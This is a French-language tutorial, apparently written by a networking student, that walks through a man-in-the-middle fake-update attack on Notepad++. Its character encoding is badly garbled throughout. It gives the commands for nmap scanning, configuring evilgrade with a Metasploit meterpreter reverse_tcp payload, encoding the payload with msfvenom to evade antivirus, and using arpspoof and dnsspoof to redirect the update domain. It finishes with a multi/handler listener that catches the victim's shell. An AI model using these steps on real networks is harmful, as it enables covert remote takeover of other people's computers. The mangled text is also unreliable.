Ralis par OLIVIER Thomas tudiant en Master Rseau et !curit In"ormati#ue a l$uni%ersit &aris '( )i%eau * mo+en, a%anc Outils * Backtrack, )map, Metasploit, -irspoo", .nsspoo" , E%il/rade( Les outils )map, Metasploit, -irspoo", .nsspoo" sont d01 prsents dans Backtrack, pour E%il/rade il est disponi2le 1 cette adresse http*33www(in"o2+tesec(com3down3isr4e%il/rade4(5(5(tar(/6 Installation de E%il/rade * Ou%rir un terminal Tape6 les commandes * tar 6%7" isr4e%il/rade4(5(5(tar(/6 cd isr4e%il/rade4(5(54tar(/63 (3e%il/rade .ans ce tutoriel nous allons apprendre 1 utiliser E%il/rade pour in0ecter un pa+load metasploit dans une 8 "ausse mise 1 0our 9 de notepad:: 4Installe6 E%il/rade comme montrer ci4dessus( !i l$erreur Can't locate Data/Dump.pm in @INC sur%ient utiliser la commande sui%ante : cpan .ata**.ump puis recommence6 la commande (3e%il/rade 4;ne "ois E%il/rade installer, a%ant de commencer e""ectuons un scan a"in de trou%er l$adresse ip de la %ictime ainsi #ue la %ersion de son s+st<me d$e7ploitation = laisser cette "en>tre de terminal ou%erte , elle nous sera utile pour la suite du tutoriel?( 4&our e""ectuer un scan nous allons utiliser nmap .ans notre e7emple notre rseau est @A(@BC(5(5( 4;tilisons donc la commande sui%ante * nmap 4s! 4O 4T' @A(@BC(5(D 4Ici on e""ectue un scan "urti" =stealth !E) scan? sur toutes les machines du rseau @A(@BC(5(5, la commande 4O permet d$acti%er la %isualisation du s+st<me d$e7ploitation et 4T' si/ni"ie la %itesse de scan= ici T' est la %itesse ma7imale?( 4Lancer E%il/rade &lace6 %ous dans le dossier d$E%il/rade et tappe6 (3e%il/rade 4;tilise6 la commande show modules dans la console E%il/rade, %ous de%e6 o2tenir une liste de lo/iciels compati2le .ans ce tutoriel nous allons utiliser l$outil )otepad:: 4On tape donc la commande * con"i/ure notepadplus dans le terminal pour accder au module notepad::( - ce moment nous connaissons donc l$adresse ip de la %ictime, la %ersion de son s+st<me d$e7ploitation ainsi #ue les ports ou%erts sur la machine( Il est donc temps de con"i/urer notre a/ent pour crer un pa+load metasploit* &our cela dans le terminal E%il/rade on utilise la commande sui%ante * e%il/rade=notepadplus?Fset a/ent $GH3pentest3e7ploits3"rameworkI3ms"pa+load windows3meterpreter3re%erseJtcp LHO!TK Lip %ictime L&ORTK portchoisi M F NOO;T OF3tmp3notepadplus4%BBB(e7eNOO;TOFHP$ 3pentest3e7ploits3"rameworkI3ms"pa+load permet de char/er ms"pa+load windows3meterpreter3re%erseJtcp est le pa+load utilis permettra d$ou%rir une shell meterpreter lors#uQon aura russi( LHO!T est l$adresse I& de notre machine =de l$atta#uant ? et L&ORT est le port utilis pour intera/ir a%ec notre %ictime lors#u$on aura russi notre opration( 4Vous pou%e6 aussi a"in de ne pas etre dtecter par l$anti%irus encoder %otre pa+load, un tutoriel est disponi2le ici pour l$encoda/e a%ec ms"%enom( 4Vous pou%e6 donc crire set a/ent $GH3pentest3e7ploits3"rameworkI3ms"%enom 4p windows3meterpreter3re%erseJtcp 4" raw 4e 7CB30mpJcallJadditi%e LHO!TK@A(@BC(5( L&ORTK@IR M F NOO;TOF3tmp3notepadplus4%BBB(e7eNOO;TOFHP$ par e7emple( On o2tient =ici la sortie du pa+load est 3root3.esktop3 ?* 4Tou0ours sur le terminal E%il/rade utilise6 la commande start Vri"ie6 2ien #ue %otre port C5 est %ide( )ous en a%ons "ini a%ec la partie con"i/uration de l$a/ent E%il/rade Sontinuons a%ec la mise en place de l$atta#ue Man In The Middle =MITM? 4.ans cette partie nous allons utiliser l$atta#ue MITM a"in de spoo"er le .)! de l$adresse de mise 1 0our, plus simplement nous allons "aire croire a la machine de la %ictime #ue l$adresse de mise 1 0our du lo/iciel est la nTtre au lieu de l$adresse relle( 4-%ant de commencer cette opration commenUons par acti%er le mode routa/e sur notre machine en e""et elle n$est pas acti%er par d"aut pour cela tape6 echo @ F 3proc3s+s3net3ip%R3ipJ"orward 4;ne "ois ceci "ais crer un "ichier dns(t7t dans le repertoire de %otre choi7 =pense6 1 note6 le chemin nous en aurons 2esoin ultrieurement? ( La con"i/uration de ce "ichier est la sui%ante * Dip de redirection D D url de l$adresse a spoo"D %otre Lip notepad4plus(source"or/e(net 4&assons maintenant 1 l$atta#ue MITM , ici nous allons utiliser deu7 outils arpspoo" et dnsspoo"( 4SommenUons par crer l$arp poisonin/, dans un terminal utiliser la commande sui%ante * arpspoo" 4i %otreinter"ace 4t LipJ%ictime LipJpasserelle 4Ensuite dans un autre terminal rpter la commande en sens in%erse * arpspoo" 4i %otreinter"ace 4t LipJpasserelle LipJ%ictime 4L$arp poisonin/ 1 commencer , il est temps de commencer le dns spoo"in/, lancer un nou%eau terminal et utiliser dnsspoo" comme ceci * dnsspoo" 4i %otreinter"ace 4" cheminJduJ"ichierJdns(t7t Vous de%e6 donc o2tenir ces I "en>tres = ici les adresses mac sont e""aces ? 4Le "au7 ser%eur We2 est lanc par E%il/rade, notre -rp poisonin/ et notre .)! !poo" nous permet de spoo"er l$adresse de mise 1 0our( 4;tilisons maintenant la commande ms"cli pour crer un ser%ice d$coute sur la machine( 4.ans une nou%elle console metasploit tappe6 * ms"cli multi3handler &-ELO-.Kwindows3meterpreter3re%erseJtcp L&ORTK%otreportchoisi LHO!TK%otre Lip 4Tout est termin, il ne reste plus #u$a attendre la mise 1 0our de l$application de %otre %ictime( !i la %ictime accepte * 4Lors#ue %otre %ictime "ais sa mise 1 0our , /rVce au pa+load %ous %oila connecter sur sa machine( S$est /a/nW ;n tutoriel de pri%il</e escalation est disponi2le 1 cette adresse pour o2tenir le ni%eau -dministrateur( Se tutoriel est en partie inspir par le tutoriel du 2lo/ de Monsieur Vishnu Valentino disponi2le a l$adresse * http*33%ishnu%alentino(com3 =2lo/ #ue 0e %ous conseil "ortement *? ? W La %ersion de notepad :: utilise pour ce tutoriel est la %ersion '(C(, il se peut #ue tout ne "onctionne pas comme pr%u sur des %ersions plus rcentes( &our connaXtre les %ersions supportes lise6 ce document(